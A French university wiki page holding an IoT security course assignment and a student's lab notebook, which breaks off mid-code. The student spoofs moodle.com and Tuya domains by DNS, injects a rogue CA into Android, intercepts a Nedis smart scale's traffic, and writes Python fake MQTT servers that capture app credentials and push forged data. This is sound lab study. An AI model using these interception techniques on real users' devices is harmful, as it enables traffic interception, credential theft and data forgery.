wiki-se.plil.fr - Contributions [fr]

SE5 IdO sécurité des objets 2025/2026

2026-01-29T22:30:58Z

Vdetrez : /* Répartition des binômes pour le module de sécurité des objets */

= Infrastructure réseau pour 2025/2026 =

== Serveur virtuel ==

Créez un serveur virtuel sur <code>capbreton</code> par binôme. Préfixez le nom du serveur par <code>SE5-</code>. Le serveur doit avoir une unique interface dans le commutateur virtuel <code>bridgeStudents</code>.

Prenez une adresse IPv4 à partir de <code>172.26.145.100</code> et utilisez, comme routeur, l'adresse IPv4 <code>172.26.145.251</code>. Le routeur à cette adresse est configuré pour faire passer vos machines par un dispositif de type mascarade.

Par la suite ajoutez à votre serveur une interface dans le VLAN <code>400+X</code> numérotée dans le sous-réseau IPv4 <code>172.16.X.0/24</code>. Bien entendu <code>X</code> est différent d'un binôme à l'autre (et <code>X</code>>1).

== Point d'accès WiFi ==

Installez un ou plusieurs point d'accès WiFi Cisco sur un port de commutateur en mode trunk. Tentez d'associer une adresse d'administration à ce point d'accès dans le VLAN 50 (adresse d'administration en <code>172.26.145.Y</code>).

== Sécurisation WiFi par WPA2-PSK ==

Créez un SSID associé à votre VLAN et configuré pour une identification par WPA2-PSK.

De plus implantez les services suivant sur votre serveur virtuel :
* configuration par DHCP pour les clients WiFi, utilisez les adresses d'octet de poids faible <code>100</code> à <code>200</code> du réseau IPv4 de votre VLAN privé. Donner l'adresse de votre machine mandataire comme routeur par défaut et comme serveur DNS ;
* Implanter un serveur DNS minimal sur votre serveur virtuel (DNS transitaire ou DNS forwarder en patoi) ;
* Implanter une mascarade sur votre serveur virtuel entre votre VLAN privé et le routeur du réseau des salles de projets.

Vous pouvez tester la visibilité de votre SSID, l'identification WiFi, le serveur DHCP et enfin l'accès à Internet en utilisant votre téléphone portable ou la carte WiFi des zabeth.

= Interception de flux =

L'étude d'applications mobiles peut passer par la redirection de flux TCP pour de la rétro-ingénierie. Deux voies sont possibles, une redirection par DNS ou une redirection de flux TCP vers un port local.

== Redirection par DNS ==

Ajoutez une zone primaire à votre serveur DNS avec le nom Internet que vous souhaitez rediriger vers votre machine locale.

== Redirection réseau ==

Ajoutez des règles <code>iptables</code>/<code>nftables</code> pour rediriger un flux TCP vers un port local.

== Serveur apache sécurisé ==

En régle générale, c'est un flux HTTPS que vous souhaitez rediriger, vous avez donc besoin d'un serveur Web local en mode sécurisé (HTTPS).

= Machine virtuelle <code>android</code> =

La redirection de flux HTTPS est problématique à cause de la protection par certificat X509. Pour contourner cette protection, une solution consiste à ajouter des autorités de certification sur l'appareil où l'application mobile est installée. Pour ce faire il est probable qu'il faille un contrôle important sur l'OS de l'appareil. Comme vous pouvez rechigner à rooter votre mobile, une machine virtuelle <code>android</code> semble adaptée.

Il vous est proposé de tester de créer une machine virtuelle <code>android</code> soit par émulation d'un ARM en utilisant <code>QEMU</code> sur un PC ordinaire soit en utilisant <code>KVM</code> sur une Raspberry Pi.

= Répartition des binômes pour le module de sécurité des objets =

Donnez les élèves dans chaque binôme.

{| class="wikitable"
! Binôme !! Elèves !! Nom du serveur virtuel !! N° du VLAN
|-
| [[SE5 IdO sécurité des objets 2025/2026 b1 | Cahier b1]] || Victorien Détrez || SE5.vdetrez || n°410
|-
| [[SE5 IdO sécurité des objets 2025/2026 b2 | Cahier b2]] || Kaoutar El Bachiri || SE5-kelbachi || n°409
|-
| [[SE5 IdO sécurité des objets 2025/2026 b3 | Cahier b3]] || Heriniaina Raissa Andrianirintsoa || SE5-handrian || n°411
|-
| [[SE5 IdO sécurité des objets 2025/2026 b4 | Cahier b4]] || Abdel Zongo || SE5-azongo || n°404
|-
| [[SE5 IdO sécurité des objets 2025/2026 b5 | Cahier b5]] || Chaymae Rhanim || SE5-crhanim || n°408
|-
|}

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-24T09:14:35Z

Vdetrez : /* Envoi de fausses informations vers l'application */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi et sécurisation WiFi par WPA2-PSK (29/09) =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sur le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommée CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du PC qui est simulée comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois-ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps, j'ai donc routé mon téléphone avec l'utilitaire Magisk en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque démarrage du téléphone le certificat en question.

Le certificat peut être ajouté dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse-personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment où elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon PC (celui qui host ma VM Android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire, je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>Visiblement notre balance communique avec Tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant, on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de Bind, un fichier db.tuyaeu.com et une page Apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que, quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que, dès que la balance tente de se connecter, elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisqu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir à injecter le certificat dans la balance en communiquant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronées de notre serveur vers notre application.

Dans un premier temps, on va tenter d'établir une connexion sécurisée entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en Python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour qu'il ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis.<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
